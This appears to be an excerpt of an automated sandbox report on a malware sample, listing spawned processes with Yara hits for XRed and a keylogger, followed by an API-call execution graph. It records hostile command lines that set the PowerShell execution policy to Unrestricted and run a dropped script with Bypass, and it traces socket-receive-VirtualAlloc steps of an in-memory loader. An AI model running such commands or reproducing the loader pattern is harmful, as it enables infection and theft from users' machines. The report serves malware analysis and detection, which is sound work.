                                                                                                                                                                    • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000000.00000003.1666861585.00000000067FE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                    • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000000.00000003.1666861585.00000000067FE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    Target ID:1
                                                                                                                                                                    Start time:22:58:58
                                                                                                                                                                    Start date:29/12/2024
                                                                                                                                                                    Path:C:\Users\user\Desktop\._cache_zhuzhu.exe
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:"C:\Users\user\Desktop\._cache_zhuzhu.exe"
                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                    File size:5'289'240 bytes
                                                                                                                                                                    MD5 hash:B4F00FBA3327488D4CB6FD36B2D567C6
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:Borland Delphi
                                                                                                                                                                    Yara matches:
                                                                                                                                                                    • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000001.00000002.1772641629.0000000000403000.00000020.00000001.01000000.00000005.sdmp, Author: Joe Security
                                                                                                                                                                    • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000001.00000000.1664705656.00000000006F9000.00000008.00000001.01000000.00000005.sdmp, Author: Joe Security
                                                                                                                                                                    • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000001.00000000.1663851009.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Author: Joe Security
                                                                                                                                                                    • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: C:\Users\user\Desktop\._cache_zhuzhu.exe, Author: Joe Security
                                                                                                                                                                    • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\Desktop\._cache_zhuzhu.exe, Author: Joe Security
                                                                                                                                                                    Antivirus matches:
                                                                                                                                                                    • Detection: 0%, ReversingLabs
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    Target ID:2
                                                                                                                                                                    Start time:22:58:58
                                                                                                                                                                    Start date:29/12/2024
                                                                                                                                                                    Path:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:"C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                    File size:771'584 bytes
                                                                                                                                                                    MD5 hash:382B0F88502E718DFDF96DBC3AA3400A
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:Borland Delphi
                                                                                                                                                                    Yara matches:
                                                                                                                                                                    • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: 00000002.00000003.1744249799.00000000005FF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                    • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security
                                                                                                                                                                    • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security
                                                                                                                                                                    • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security
                                                                                                                                                                    Antivirus matches:
                                                                                                                                                                    • Detection: 100%, Avira
                                                                                                                                                                    • Detection: 100%, Avira
                                                                                                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                    • Detection: 92%, ReversingLabs
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    Target ID:3
                                                                                                                                                                    Start time:22:59:01
                                                                                                                                                                    Start date:29/12/2024
                                                                                                                                                                    Path:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:"C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
                                                                                                                                                                    Imagebase:0x650000
                                                                                                                                                                    File size:53'161'064 bytes
                                                                                                                                                                    MD5 hash:4A871771235598812032C822E6F68F19
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:high
                                                                                                                                                                    Has exited:false

                                                                                                                                                                    Target ID:4
                                                                                                                                                                    Start time:22:59:01
                                                                                                                                                                    Start date:29/12/2024
                                                                                                                                                                    Path:C:\Users\user\AppData\Roaming\._cache_zhuzhu.exe
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:"C:\Users\user\AppData\Roaming\._cache_zhuzhu.exe"
                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                    File size:5'289'240 bytes
                                                                                                                                                                    MD5 hash:B4F00FBA3327488D4CB6FD36B2D567C6
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:Borland Delphi
                                                                                                                                                                    Yara matches:
                                                                                                                                                                    • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exe, Author: Joe Security
                                                                                                                                                                    • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exe, Author: Joe Security
                                                                                                                                                                    Antivirus matches:
                                                                                                                                                                    • Detection: 0%, ReversingLabs
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Has exited:false

                                                                                                                                                                    Target ID:7
                                                                                                                                                                    Start time:22:59:07
                                                                                                                                                                    Start date:29/12/2024
                                                                                                                                                                    Path:C:\Users\user\Downloads\inst.exe
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:C:\Users\user\Downloads\inst.exe
                                                                                                                                                                    Imagebase:0x160000
                                                                                                                                                                    File size:4'118'496 bytes
                                                                                                                                                                    MD5 hash:AAA0F14BDFE3777EEE342C27DE409E6D
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Antivirus matches:
                                                                                                                                                                    • Detection: 17%, ReversingLabs
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Has exited:false

                                                                                                                                                                    Target ID:8
                                                                                                                                                                    Start time:22:59:08
                                                                                                                                                                    Start date:29/12/2024
                                                                                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:cmd.exe /C powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"
                                                                                                                                                                    Imagebase:0x240000
                                                                                                                                                                    File size:236'544 bytes
                                                                                                                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:high
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    Target ID:9
                                                                                                                                                                    Start time:22:59:08
                                                                                                                                                                    Start date:29/12/2024
                                                                                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:cmd.exe /C powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1
                                                                                                                                                                    Imagebase:0x240000
                                                                                                                                                                    File size:236'544 bytes
                                                                                                                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:high
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    Target ID:10
                                                                                                                                                                    Start time:22:59:08
                                                                                                                                                                    Start date:29/12/2024
                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:high
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    Target ID:11
                                                                                                                                                                    Start time:22:59:08
                                                                                                                                                                    Start date:29/12/2024
                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:high
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    Target ID:12
                                                                                                                                                                    Start time:22:59:08
                                                                                                                                                                    Start date:29/12/2024
                                                                                                                                                                    Path:C:\Users\user\Downloads\inst.exe
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:C:\Users\user\Downloads\inst.exe
                                                                                                                                                                    Imagebase:0x160000
                                                                                                                                                                    File size:4'118'496 bytes
                                                                                                                                                                    MD5 hash:AAA0F14BDFE3777EEE342C27DE409E6D
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    Target ID:13
                                                                                                                                                                    Start time:22:59:09
                                                                                                                                                                    Start date:29/12/2024
                                                                                                                                                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"
                                                                                                                                                                    Imagebase:0xe60000
                                                                                                                                                                    File size:433'152 bytes
                                                                                                                                                                    MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    Target ID:14
                                                                                                                                                                    Start time:22:59:09
                                                                                                                                                                    Start date:29/12/2024
                                                                                                                                                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1
                                                                                                                                                                    Imagebase:0xe60000
                                                                                                                                                                    File size:433'152 bytes
                                                                                                                                                                    MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    Target ID:15
                                                                                                                                                                    Start time:22:59:11
                                                                                                                                                                    Start date:29/12/2024
                                                                                                                                                                    Path:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:"C:\ProgramData\Synaptics\Synaptics.exe"
                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                    File size:771'584 bytes
                                                                                                                                                                    MD5 hash:382B0F88502E718DFDF96DBC3AA3400A
                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                    Programmed in:Borland Delphi
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    Target ID:19
                                                                                                                                                                    Start time:22:59:22
                                                                                                                                                                    Start date:29/12/2024
                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    Target ID:22
                                                                                                                                                                    Start time:22:59:55
                                                                                                                                                                    Start date:29/12/2024
                                                                                                                                                                    Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5780 -s 12156
                                                                                                                                                                    Imagebase:0xa20000
                                                                                                                                                                    File size:483'680 bytes
                                                                                                                                                                    MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    Target ID:24
                                                                                                                                                                    Start time:23:00:06
                                                                                                                                                                    Start date:29/12/2024
                                                                                                                                                                    Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5780 -s 12156
                                                                                                                                                                    Imagebase:0xa20000
                                                                                                                                                                    File size:483'680 bytes
                                                                                                                                                                    MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    Target ID:26
                                                                                                                                                                    Start time:23:01:03
                                                                                                                                                                    Start date:29/12/2024
                                                                                                                                                                    Path:C:\Windows\splwow64.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\splwow64.exe 12288
                                                                                                                                                                    Imagebase:0x7ff64f8f0000
                                                                                                                                                                    File size:163'840 bytes
                                                                                                                                                                    MD5 hash:77DE7761B037061C7C112FD3C5B91E73
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Has exited:false


                                                                                                                                                                      Execution Graph

                                                                                                                                                                      Execution Coverage:7.1%
                                                                                                                                                                      Dynamic/Decrypted Code Coverage:99.8%
                                                                                                                                                                      Signature Coverage:4.8%
                                                                                                                                                                      Total number of Nodes:1619
                                                                                                                                                                      Total number of Limit Nodes:5
9731->9815 9733 10002f47 9733->9620 9735 1000223c HandleT Concurrency::task_continuation_context::task_continuation_context 9734->9735 9738 10003230 9735->9738 9737 1000228e 9737->9710 9739 10003247 Concurrency::task_continuation_context::task_continuation_context 9738->9739 9741 10003251 Concurrency::task_continuation_context::task_continuation_context 9739->9741 9749 100015e0 ?_Xlength_error@std@@YAXPBD 9739->9749 9742 1000327b 9741->9742 9744 100032ab Concurrency::task_continuation_context::task_continuation_context 9741->9744 9750 10002ac0 memmove 9742->9750 9745 10003aa0 Concurrency::task_continuation_context::task_continuation_context 6 API calls 9744->9745 9747 100032d2 HandleT Concurrency::task_continuation_context::task_continuation_context 9745->9747 9746 1000329d Concurrency::task_continuation_context::task_continuation_context 9746->9737 9751 10002ac0 memmove 9747->9751 9749->9741 9750->9746 9751->9746 9753 100022e1 _Error_objects 9752->9753 9753->9717 9757 100026b0 9754->9757 9758 100026c0 HandleT 9757->9758 9761 10002bc0 9758->9761 9760 10002093 9760->9723 9762 10002bd4 Concurrency::task_continuation_context::task_continuation_context 9761->9762 9763 10002c18 9761->9763 9767 10002d50 memmove 9762->9767 9768 10003480 9763->9768 9766 10002bf9 Concurrency::task_continuation_context::task_continuation_context 9766->9760 9767->9766 9769 10003491 Concurrency::task_continuation_context::task_continuation_context 9768->9769 9771 1000349b Concurrency::task_continuation_context::task_continuation_context 9769->9771 9778 100015e0 ?_Xlength_error@std@@YAXPBD 9769->9778 9772 10003aa0 Concurrency::task_continuation_context::task_continuation_context 6 API calls 9771->9772 9773 100034cc HandleT Concurrency::task_continuation_context::task_continuation_context 9772->9773 9779 10002c40 9773->9779 9775 10003509 9776 10002c80 Concurrency::task_continuation_context::task_continuation_context 2 API calls 9775->9776 9777 10003523 
Concurrency::task_continuation_context::task_continuation_context 9775->9777 9776->9777 9777->9766 9778->9771 9782 10002ac0 memmove 9779->9782 9781 10002c5a Concurrency::task_continuation_context::task_continuation_context 9781->9775 9782->9781 9784 10002020 HandleT 9783->9784 9787 100026e0 9784->9787 9786 10002039 9786->9730 9788 10002700 Concurrency::task_continuation_context::task_continuation_context 9787->9788 9789 1000274d 9787->9789 9793 10002d50 memmove 9788->9793 9794 10003360 9789->9794 9792 1000272b Concurrency::task_continuation_context::task_continuation_context 9792->9786 9793->9792 9795 10003380 Concurrency::task_continuation_context::task_continuation_context 9794->9795 9797 1000338d Concurrency::task_continuation_context::task_continuation_context 9795->9797 9807 100015e0 ?_Xlength_error@std@@YAXPBD 9795->9807 9798 10003aa0 Concurrency::task_continuation_context::task_continuation_context 6 API calls 9797->9798 9799 100033c7 HandleT Concurrency::task_continuation_context::task_continuation_context 9798->9799 9800 10003447 9799->9800 9801 100033fc HandleT 9799->9801 9802 10002780 memmove 9800->9802 9808 10002780 9801->9808 9806 1000343a Concurrency::task_continuation_context::task_continuation_context 9802->9806 9804 10003429 9805 10002c80 Concurrency::task_continuation_context::task_continuation_context 2 API calls 9804->9805 9805->9806 9806->9792 9807->9797 9813 10002ac0 memmove 9808->9813 9810 1000279a 9814 10002ac0 memmove 9810->9814 9812 100027b1 Concurrency::task_continuation_context::task_continuation_context 9812->9804 9813->9810 9814->9812 9816 1000205a Concurrency::task_continuation_context::task_continuation_context 9815->9816 9817 100026e0 11 API calls 9816->9817 9818 1000206d 9817->9818 9818->9733 9820 100048f8 9819->9820 9821 10002190 8 API calls 9820->9821 9822 1000490e 9821->9822 10077 100046a0 GetModuleFileNameA 9822->10077 9824 10004921 _Smanip _Error_objects 10111 1000b990 9824->10111 9826 10004f87 _Smanip _Error_objects 9827 
1000b990 10 API calls 9826->9827 9828 100098a2 9827->9828 10115 10004540 9828->10115 9831 10004540 10 API calls 9832 100098d3 _Error_objects 9831->9832 10121 10004120 9832->10121 10060 10010139 WSACleanup exit 10059->10060 10070 10010152 10059->10070 10061 1001031d 10060->10061 10062 100101f5 freeaddrinfo 10064 10010209 WSACleanup exit 10062->10064 10072 10010222 10062->10072 10063 1001016d socket 10065 10010196 WSACleanup exit 10063->10065 10066 100101af connect 10063->10066 10064->10061 10065->10061 10067 100101d3 closesocket 10066->10067 10068 100101ee 10066->10068 10067->10070 10068->10062 10069 10010229 recv 10071 100102a1 10069->10071 10069->10072 10070->10062 10070->10063 10074 100102a7 10071->10074 10075 100102ab closesocket WSACleanup free exit 10071->10075 10072->10069 10073 10010276 realloc 10072->10073 10076 100102e8 VirtualAlloc memmove 10072->10076 10073->10072 10074->10076 10075->10061 10076->10061 10078 10002190 8 API calls 10077->10078 10079 100046e8 10078->10079 10080 10001ec0 9 API calls 10079->10080 10081 10004716 10080->10081 10082 10001ec0 9 API calls 10081->10082 10083 1000472f 10082->10083 10185 1000ba80 10083->10185 10086 10001ec0 9 API calls 10087 1000475a 10086->10087 10088 10001ec0 9 API calls 10087->10088 10092 10004773 _Error_objects 10088->10092 10089 100047da 10195 1000d1d0 10089->10195 10092->10089 10189 1000bd90 10092->10189 10192 1000bd70 10092->10192 10095 10002f30 11 API calls 10096 10004815 10095->10096 10097 100020a0 2 API calls 10096->10097 10098 10004830 10097->10098 10099 100020a0 2 API calls 10098->10099 10100 1000483c 10099->10100 10101 100020a0 2 API calls 10100->10101 10102 1000484b 10101->10102 10103 100020a0 2 API calls 10102->10103 10104 1000485a 10103->10104 10105 100020a0 2 API calls 10104->10105 10106 10004866 10105->10106 10107 100020a0 2 API calls 10106->10107 10108 10004875 10107->10108 10109 100020a0 2 API calls 10108->10109 10110 10004884 10109->10110 10110->9824 10112 1000b9b0 HandleT 10111->10112 10241 
1000d590 10112->10241 10114 1000b9e9 10114->9826 10116 10004571 _Error_objects 10115->10116 10275 1000bb30 10116->10275 10118 10004595 HandleT 10119 100045dd 10118->10119 10120 1000bc00 Concurrency::task_continuation_context::task_continuation_context 10 API calls 10118->10120 10119->9831 10120->10118 10122 1000414a 10121->10122 10307 1000b910 10122->10307 10124 10004168 10127 1000421b _Error_objects 10124->10127 10313 1000b950 10124->10313 10316 1000cd10 10127->10316 10128 10004237 10131 1000b950 10 API calls 10128->10131 10129 1000426c 10132 1000b950 10 API calls 10129->10132 10131->10127 10134 1000429c 10132->10134 10133 1000431d 10320 10004020 MultiByteToWideChar 10133->10320 10135 1000b950 10 API calls 10134->10135 10135->10127 10186 1000ba92 Concurrency::task_continuation_context::task_continuation_context 10185->10186 10201 1000d6f0 10186->10201 10190 10002010 11 API calls 10189->10190 10191 1000bda3 10190->10191 10191->10092 10208 1000bc00 10192->10208 10194 1000bd84 10194->10092 10196 1000d1e5 Concurrency::task_continuation_context::task_continuation_context 10195->10196 10198 1000d208 10196->10198 10230 100015e0 ?_Xlength_error@std@@YAXPBD 10196->10230 10231 1000df80 10198->10231 10200 100047f1 10200->10095 10202 10004742 10201->10202 10203 1000d6fe 10201->10203 10202->10086 10203->10202 10206 10003b20 memchr 10203->10206 10207 1000e0e0 memcmp 10203->10207 10206->10203 10207->10203 10209 1000bc64 10208->10209 10211 1000bc1d Concurrency::task_continuation_context::task_continuation_context 10208->10211 10212 1000d8a0 10209->10212 10211->10194 10213 1000d8c0 Concurrency::task_continuation_context::task_continuation_context 10212->10213 10215 1000d8cd Concurrency::task_continuation_context::task_continuation_context 10213->10215 10225 100015e0 ?_Xlength_error@std@@YAXPBD 10213->10225 10216 10003aa0 Concurrency::task_continuation_context::task_continuation_context 6 API calls 10215->10216 10217 1000d907 HandleT 
Concurrency::task_continuation_context::task_continuation_context 10216->10217 10218 1000d984 10217->10218 10219 1000d93c HandleT 10217->10219 10220 1000bc90 Concurrency::task_continuation_context::task_continuation_context memmove 10218->10220 10226 1000bc90 10219->10226 10223 1000d977 Concurrency::task_continuation_context::task_continuation_context 10220->10223 10222 1000d966 10224 10002c80 Concurrency::task_continuation_context::task_continuation_context 2 API calls 10222->10224 10223->10211 10224->10223 10225->10215 10229 10002ac0 memmove 10226->10229 10228 1000bcaa Concurrency::task_continuation_context::task_continuation_context 10228->10222 10229->10228 10230->10198 10236 1000dfac HandleT Concurrency::task_continuation_context::task_continuation_context 10231->10236 10232 1000e042 HandleT Concurrency::task_continuation_context::task_continuation_context 10239 10002ac0 memmove 10232->10239 10234 1000e08a 10240 10002ac0 memmove 10234->10240 10236->10232 10238 10003aa0 Concurrency::task_continuation_context::task_continuation_context 6 API calls 10236->10238 10237 1000e0a1 Concurrency::task_continuation_context::task_continuation_context 10237->10200 10238->10232 10239->10234 10240->10237 10242 1000d5b6 Concurrency::task_continuation_context::task_continuation_context 10241->10242 10243 1000d630 Concurrency::task_continuation_context::task_continuation_context 10242->10243 10249 1000dc50 10242->10249 10243->10114 10250 1000dc5f 10249->10250 10251 1000dc69 10250->10251 10263 1000c520 ?_Xlength_error@std@@YAXPBD 10250->10263 10264 1000e150 10251->10264 10255 1000e7b0 10256 1000e7d4 HandleT 10255->10256 10268 1000eb90 10256->10268 10258 1000d611 10259 1000daf0 10258->10259 10260 1000db09 10259->10260 10261 1000daff 10259->10261 10260->10243 10271 1000c540 10261->10271 10263->10251 10265 1000e183 Concurrency::task_continuation_context::task_continuation_context 10264->10265 10266 10003bb0 Concurrency::task_continuation_context::task_continuation_context 6 API 
calls 10265->10266 10267 1000d5e9 10266->10267 10267->10255 10269 1000eb9f 10268->10269 10270 1000ebbd memmove 10269->10270 10270->10258 10273 1000c566 Concurrency::task_continuation_context::task_continuation_context 10271->10273 10272 1000c5c9 10272->10260 10273->10272 10274 10002e00 allocator 2 API calls 10273->10274 10274->10272 10276 1000bb44 10275->10276 10277 1000bb46 10275->10277 10276->10118 10277->10276 10278 1000bb5e 10277->10278 10280 1000bb8c Concurrency::task_continuation_context::task_continuation_context 10277->10280 10282 1000d790 10278->10282 10280->10276 10295 1000c660 10280->10295 10283 1000d7b0 Concurrency::task_continuation_context::task_continuation_context 10282->10283 10284 1000d7bd Concurrency::task_continuation_context::task_continuation_context 10283->10284 10301 100015e0 ?_Xlength_error@std@@YAXPBD 10283->10301 10286 10003aa0 Concurrency::task_continuation_context::task_continuation_context 6 API calls 10284->10286 10287 1000d7f7 HandleT Concurrency::task_continuation_context::task_continuation_context 10286->10287 10288 1000d82c HandleT 10287->10288 10289 1000d86f 10287->10289 10302 1000bbb0 10288->10302 10290 1000bbb0 memmove 10289->10290 10294 1000d862 Concurrency::task_continuation_context::task_continuation_context 10290->10294 10293 10002c80 Concurrency::task_continuation_context::task_continuation_context 2 API calls 10293->10294 10294->10276 10296 1000c677 HandleT Concurrency::task_continuation_context::task_continuation_context 10295->10296 10306 10002ac0 memmove 10296->10306 10298 1000c6b3 Concurrency::task_continuation_context::task_continuation_context 10299 10002c80 Concurrency::task_continuation_context::task_continuation_context 2 API calls 10298->10299 10300 1000c6d5 10299->10300 10300->10276 10301->10284 10305 10002ac0 memmove 10302->10305 10304 1000bbcb 10304->10293 10305->10304 10306->10298 10308 1000b91f 10307->10308 10309 1000b936 10308->10309 10312 1000b943 10308->10312 10326 1000c520 ?_Xlength_error@std@@YAXPBD 
10308->10326 10327 1000d430 10309->10327 10312->10124 10343 1000d520 10313->10343 10315 10004209 10315->10127 10315->10128 10315->10129 10318 1000cd45 HandleT 10316->10318 10317 1000cd82 _Error_objects 10317->10133 10318->10317 10363 1000e3a0 10318->10363 10384 10010b54 10320->10384 10326->10309 10328 1000d45d Concurrency::task_continuation_context::task_continuation_context 10327->10328 10329 10003bb0 Concurrency::task_continuation_context::task_continuation_context 6 API calls 10328->10329 10330 1000d48f 10329->10330 10335 1000e4c0 10330->10335 10336 1000e4e4 HandleT 10335->10336 10337 1000eb90 memmove 10336->10337 10338 1000d4b5 10337->10338 10339 1000dbb0 10338->10339 10341 1000dbc1 Concurrency::task_continuation_context::task_continuation_context 10339->10341 10340 1000d502 10340->10312 10341->10340 10342 10002e00 allocator 2 API calls 10341->10342 10342->10340 10344 1000d553 10343->10344 10346 1000d545 10343->10346 10347 1000e5f0 10344->10347 10346->10315 10348 1000e61d Concurrency::task_continuation_context::task_continuation_context 10347->10348 10349 1000e65f 10348->10349 10362 1000c520 ?_Xlength_error@std@@YAXPBD 10348->10362 10351 10003bb0 Concurrency::task_continuation_context::task_continuation_context 6 API calls 10349->10351 10352 1000e685 HandleT 10351->10352 10353 1000e6f6 10352->10353 10354 1000e6d8 10352->10354 10356 1000e4c0 memmove 10353->10356 10355 1000e4c0 memmove 10354->10355 10359 1000e6f1 10355->10359 10357 1000e70d 10356->10357 10358 1000e4c0 memmove 10357->10358 10358->10359 10360 1000dbb0 2 API calls 10359->10360 10361 1000e791 10360->10361 10361->10346 10362->10349 10364 1000e3cc Concurrency::task_continuation_context::task_continuation_context 10363->10364 10366 1000e40c Concurrency::task_continuation_context::task_continuation_context 10364->10366 10373 100015e0 ?_Xlength_error@std@@YAXPBD 10364->10373 10367 10003aa0 Concurrency::task_continuation_context::task_continuation_context 6 API calls 10366->10367 10369 1000e42f 
